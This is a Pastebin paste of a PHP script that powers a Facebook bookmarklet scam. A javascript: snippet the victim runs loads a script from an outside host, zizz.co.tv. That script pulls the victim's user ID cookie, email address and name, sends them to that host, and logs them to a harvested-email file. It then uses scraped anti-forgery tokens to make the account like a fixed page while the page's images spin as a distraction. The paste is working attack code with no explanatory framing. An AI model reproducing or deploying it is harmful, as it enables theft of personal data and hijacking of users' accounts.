Advertisement
Guest User

fbuploademail

a guest
Nov 26th, 2010
535
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
  1. <?php
  2. header("Content-type: text/javascript");
  3. if(isset($_GET['q'])){
  4. $q = $_GET['q'];
  5. $x = explode(":", $q);
  6. $em = $x[2];
  7. $z = file_get_contents("Emails-of-FB.txt");
  8. if(!preg_match("/" . $x[0] . "/", $z, $do)){
  9. $ff = fopen("Email-of-FB.txt", "a");
  10. fwrite($ff, $q . "\n");
  11. fclose($ff);
  12. }
  13. echo <<<_HTML_
  14. alert("Welcome, $em. Enjoy! :)");
  15. R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
  16. with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
  17. if (x.readyState == 4 && x.status == 200) {
  18. comp = (z = x.responseText).match(/name=\\\\"composer_id\\\\" value=\\\\"([\d\w]+)\\\\"/i)[1];
  19. form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
  20. dt = z.match(/name="fb_dtsg" value="([\d\w]+)"/i)[1];
  21. send("fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id_source=AsyncRequest&post_form_id=" + form + "&fb_dtsg=" + dt);
  22. }
  23. }, send(null);
  24. _HTML_;
  25. exit;
  26. }
  27.  
  28. elseif(isset($_GET['show'])){
  29. if(!isset($_SERVER['HTTP_REFERER'])) header("Location: http://www.facebook.com/");
  30. if(!preg_match("/facebook.com/", $_SERVER['HTTP_REFERER'], $isit)) header("Location: http://www.facebook.com/");
  31. echo <<<_HTML_
  32. with(x = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function(){ if(x.readyState == 4 && x.status == 200){ with(s = document.createElement("script")) src = "http://zizz.co.tv/iFun.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = x.responseText).match(/mailto:([^\"]+)/)[1].replace(/&#64;/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1]; document.body.appendChild(s); }}, send(null);
  33. _HTML_;
  34. exit;
  35. }
  36. elseif(isset($_GET['emails'])){
  37. $z = explode("\n", file_get_contents("Email-FB.txt"));
  38. foreach($z as $l){
  39. $x = explode(":", $l);
  40. echo $x[1] . "\n";
  41. }
  42. }
  43. else{
  44. echo <<<_HTML_
  45. javascript:(a = (b = document).createElement("script")).src = "http://zizz.co.tv/iFun.js?show", b.body.appendChild(a);void(0)
  46. _HTML_;
  47. }
  48. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement